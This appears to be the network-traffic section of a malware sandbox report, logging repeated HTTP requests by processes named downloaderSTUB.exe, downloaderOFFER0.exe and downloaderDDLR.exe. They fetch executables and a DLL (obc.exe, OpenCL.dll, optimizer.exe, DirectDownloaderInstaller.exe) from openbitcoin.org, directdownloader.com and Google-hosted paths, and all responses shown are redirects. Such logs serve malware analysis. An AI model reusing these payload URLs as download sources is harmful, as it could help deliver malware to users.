    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    workspace.google.com
    downloaderOFFER0.exe
    186 B
    144 B
    4
    3
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    337 B
    608 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 216.239.32.21:80
    http://openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    340 B
    714 B
    5
    5

    HTTP Request

    GET http://openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 162.255.119.249:80
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    356 B
    627 B
    5
    5

    HTTP Request

    GET http://www.directdownloader.com/DirectDownloaderInstaller.exe

    HTTP Response

    302
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    340 B
    611 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 162.255.119.249:80
    http://www.directdownloader.com/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    349 B
    613 B
    5
    5

    HTTP Request

    GET http://www.directdownloader.com/toolbars/optimizer.exe

    HTTP Response

    302
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.200.4:80
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    385 B
    925 B
    5
    5

    HTTP Request

    GET http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.200.4:80
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    378 B
    911 B
    5
    5

    HTTP Request

    GET http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.200.46:80
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    763 B
    889 B
    7
    5

    HTTP Request

    GET http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    695 B
    664 B
    8
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.200.46:80
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    426 B
    875 B
    6
    5

    HTTP Request

    GET http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    654 B
    719 B
    9
    7

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 216.58.213.14:80
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    536 B
    920 B
    6
    5

    HTTP Request

    GET http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    558 B
    956 B
    9
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    485 B
    1.1kB
    8
    7

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    492 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 216.58.213.14:80
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    356 B
    906 B
    5
    5

    HTTP Request

    GET http://gsuite.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    433 B
    652 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    787 B
    704 B
    10
    7

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    1.2kB
    906 B
    10
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    393 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    550 B
    667 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    393 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    451 B
    946 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    580 B
    958 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    574 B
    906 B
    7
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    542 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    405 B
    946 B
    6
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    458 B
    960 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    544 B
    664 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    580 B
    958 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    418 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    433 B
    652 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    411 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    492 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    550 B
    667 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    492 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    655 B
    6
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    594 B
    920 B
    7
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    550 B
    667 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    485 B
    1.1kB
    8
    7

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    393 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

